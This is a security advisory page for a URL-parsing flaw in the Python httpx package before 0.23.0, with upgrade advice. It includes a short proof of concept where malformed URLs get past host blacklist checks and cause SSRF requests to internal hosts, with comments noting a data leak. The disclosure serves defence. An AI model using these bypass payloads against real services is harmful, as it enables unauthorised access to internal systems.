Improper Input Validation Affecting httpx package, versions [,0.23.0)
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of Concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Improper Input Validation vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-PYTHON-HTTPX-2772742
- published13 May 2022
- disclosed21 Apr 2022
- creditlebr0nli
Introduced: 21 Apr 2022
CVE NOT AVAILABLE CWE-20 (opens in a new tab)Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
Upgrade httpx to version 0.23.0 or higher.
Overview
httpx is a The next generation HTTP client.
Affected versions of this package are vulnerable to Improper Input Validation due to improper implementation of httpx.URL().copy_with, that causes httpx.Client and httpx.Proxy to parse wrong URL. Exploiting this vulnerability leads to blacklist bypass.
PoC:
httpx.Client
user_input_from_http_request = 'http:////admin-dashboard/secret'
u = httpx.URL(user_input_from_http_request)
assert u.host.lower() != 'admin-dashboard'
resp = httpx.Client(base_url=u).get('/') # SSRF to http://admin-dashboard/secret
print(resp.text) # sensitive data leak
httpx.Proxy
user_input_from_http_request = 'http://x@//internal-proxy:8082/'
u = httpx.URL(user_input_from_http_request)
assert u.host.lower() != 'internal-proxy'
# httpx.Proxy(u).url.netloc == b'internal-proxy:8082'
resp = httpx.Client(proxies=u).get('/') # will request via http proxy at internal-proxy:8082
References
CVSS Base Scores
version 3.1